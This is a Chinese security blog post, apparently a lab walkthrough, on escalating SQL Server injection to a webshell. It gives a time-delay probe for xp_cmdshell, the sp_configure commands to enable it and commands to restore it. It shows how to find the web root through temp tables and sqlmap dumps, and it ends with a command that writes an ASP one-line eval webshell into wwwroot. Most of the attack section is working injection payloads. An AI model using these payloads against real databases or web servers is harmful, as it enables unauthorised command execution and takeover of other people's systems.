<!DOCTYPE html><html lang="en"><head><meta name="generator" content="Hexo 3.9.0"><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description"><title>SQL SERVER 注入（三） | WLSMILE Blog</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=0.0.0"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/normalize/8.0.1/normalize.min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/pure-min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/grids-responsive-min.css"><link rel="stylesheet" href="//lib.baomitu.com/font-awesome/4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//lib.baomitu.com/jquery/3.4.0/jquery.min.js"></script><link rel="icon" mask sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">SQL SERVER 注入（三）</h1><a id="logo" href="/.">WLSMILE Blog</a><p class="description"></p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> Home</i></a><a href="/archives/"><i class="fa fa-archive"> Archive</i></a><a href="/about/"><i class="fa fa-user"> About</i></a><a href="/atom.xml"><i class="fa fa-rss"> RSS</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">SQL SERVER 注入（三）</h1><div class="post-meta">Oct 14, 2019<span> | </span><span class="category"><a href="/categories/Web安全/">Web安全</a></span></div><div class="post-content"><h1 id="开启xp-cmdshell获取webshell"><a href="#开启xp-cmdshell获取webshell" class="headerlink" title="开启xp_cmdshell获取webshell"></a>开启xp_cmdshell获取webshell</h1><p>xp_cmdshell 在 SQL server 2005 版本以上是默认关闭的，我们需要手动打开它，但在此之前我们需要进行第一步：判断是否存在组件 xp_cmdshell</p>
<pre><code>;if(1=(select count(*) from master.dbo.sysobjects where xtype = &#39;x&#39; and name =&#39;xp_cmdshell&#39;)) WAITFOR DELAY &#39;0:0:5&#39;</code></pre><p>如果延迟 5s后返回正常页面的话则判断存在组件 xp_cmdshell。<br>如果删除了xp_cmdshell 组件的话可以用下面的命令恢复</p>
<pre><code>恢复／删除 xp_cmdshell
exec sp_addextendedproc xp_cmdshell,@dllname=&#39;xplog70.dll&#39;
exec sp_dropextendedproc &#39;xplog70.dll&#39;</code></pre><p>关闭xp_cmdshell</p>
<pre><code>EXEC sp_configure &#39;show advanced options&#39;,1;
RECONFIGURE;
EXEC sp_configure &#39;xp_cmdshell&#39;,0;
RECONFIGURE;</code></pre><p>启用xp_cmdshell</p>
<pre><code>EXEC sp_configure &#39;show advanced options&#39;,1;
RECONFIGURE;
EXEC sp_configure &#39;xp_cmdshell&#39;,1;
RECONFIGURE;</code></pre><p>成功开启 xp_cmdshell 之后，我们要进行的最重要的一步就是找到网站的根路径，这里也<br>是较难的一点。下面有三种方法：</p>
<ul>
<li>找到报错页面得到物理路径，如 404页面</li>
<li>查找网站文件并把路径写入到临时表当中</li>
<li>列出各个盘下面的文件，将其写入临时表查看</li>
</ul>
<p>1.对于一些粗心的网站管理员可能 404 等错误页面是iis 默认的报错页面，而这个报错页面就会暴露出网站的物理路径，此时我们就可以写一个shell 文件进去。</p>
<p><img src="/images/8/1.png" alt></p>
<p>2.在大佬博客上看到的找物理路径的方法是找到一个网站文件，将其路径写入临时表后再使<br>用sqlmap跑出来。具体思路如下:</p>
<p>在数据库 tempdb创建临时表temp</p>
<pre><code>;use test;create table tt_tmp (tmp1 varchar(1000));</code></pre><p><img src="/images/8/2.png" alt></p>
<p>创建完成之后使用 sqlmap 可以看到成功创建表temp</p>
<p>Sqlmap命令: </p>
<pre><code>python27 sqlmap.py-u&quot;192.168.10.19/char.asp?id=1&quot;-D test --tables</code></pre><p><img src="/images/8/3.png" alt></p>
<p>之后我们将char.asp文件的路径写入到该字段当中</p>
<pre><code>;use test;insert into tt_tmp(tmp1) exec master..xp_cmdshell &#39;dir /s /b c:\char.asp&#39;;</code></pre><p><img src="/images/8/4.png" alt></p>
<p>这个语句回车之后的响应时间会稍微长一点，是因为将很数据插入到表中需要一定时间</p>
<p>Sqlmap命令:</p>
<pre><code>python27 sqlmap.py -u &quot;192.168.10.19/char.asp?id=1&quot; -D test -T tt_tmp -C tmp1 --dump</code></pre><p><img src="/images/8/5.png" alt></p>
<p>这样我们成功的查询到了网站的根路径，随后我们尝试写入一句话</p>
<pre><code>;exec master..xp_cmdshell &#39;echo ^&lt;script language=vbs runat=server^&gt;eval(request(&quot;c&quot;))^&lt;/script^&gt; &gt; c:\\inetpub\\wwwroot\\shell.asp&#39;;</code></pre><p>执行之后返回正常界面，我们访问 192.168.10.19/shell.asp 观察</p>
<p><img src="/images/8/6.png" alt></p>
<p>返回状态码200，asp,内容已经被成功解析，查看靶机是否被成功写入。</p>
<p><img src="/images/8/6.png" alt></p>
<p>成功写入一句话木马，尝试才到连接</p>
<p><img src="/images/8/7.png" alt></p>
<p><img src="/images/8/8.png" alt></p>
<p><img src="/images/8/9.png" alt></p>
<p>成功获取 webshell</p>
</div><div class="tags"><a href="/tags/注入/">注入</a><a href="/tags/sql-server/">sql server</a></div><div class="post-nav"><a class="pre" href="/2019/10/15/9/">泛微OA远程代码执行</a><a class="next" href="/2019/10/11/7/">SQL SERVER 注入（二）</a></div></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><form class="search-form" action="//www.google.com/search" method="get" accept-charset="utf-8" target="_blank"><input type="text" name="q" maxlength="20" placeholder="Search"><input type="hidden" name="sitesearch" value="https://luckdogiii.github.io"></form></div><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> Categories</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/Linux/">Linux</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Web安全/">Web安全</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/其他/">其他</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/工具/">工具</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> Tags</i></div><div class="tagcloud"><a href="/tags/sqlmap/" style="font-size: 15px;">sqlmap</a> <a href="/tags/漏洞复现/" style="font-size: 15px;">漏洞复现</a> <a href="/tags/提权/" style="font-size: 15px;">提权</a> <a href="/tags/Linux/" style="font-size: 15px;">Linux</a> <a href="/tags/注入/" style="font-size: 15px;">注入</a> <a href="/tags/sql-server/" style="font-size: 15px;">sql server</a> <a href="/tags/漏洞利用/" style="font-size: 15px;">漏洞利用</a> <a href="/tags/端口信息/" style="font-size: 15px;">端口信息</a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-file-o"> Recent</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/11/06/11/">端口信息及漏洞利用总结（转）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/15/10/">致远 OA A8远程Getshell</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/15/9/">泛微OA远程代码执行</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/14/8/">SQL SERVER 注入（三）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/11/7/">SQL SERVER 注入（二）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/11/6/">SQL SERVER 注入（一）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/09/5/">Linux提权（二）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/09/4/">Linux提权（一）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/08/2/">phpstudy远程代码执行复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/08/1/">SQLMAP使用总结</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> Links</i></div><ul></ul><a href="http://www.example1.com/" title="wlsmile" target="_blank">wlsmile</a><ul></ul><a href="http://www.example2.com/" title="site-name2" target="_blank">site-name2</a><ul></ul><a href="http://www.example3.com/" title="site-name3" target="_blank">site-name3</a></div></div></div><div class="pure-u-1 pure-u-md-3-4"><div id="footer">Copyright © 2019 <a href="/." rel="nofollow">WLSMILE Blog.</a> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a><a rel="nofollow" target="_blank" href="https://github.com/tufu9441/maupassant-hexo"> Theme</a> by<a rel="nofollow" target="_blank" href="https://github.com/pagecho"> Cho.</a></div></div></div><a class="show" id="rocket" href="#top"></a><script type="text/javascript" src="/js/totop.js?v=0.0.0" async></script><script type="text/javascript" src="//lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=0.0.0" async></script><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css"><script type="text/javascript" src="/js/codeblock-resizer.js?v=0.0.0"></script><script type="text/javascript" src="/js/smartresize.js?v=0.0.0"></script></div></body></html>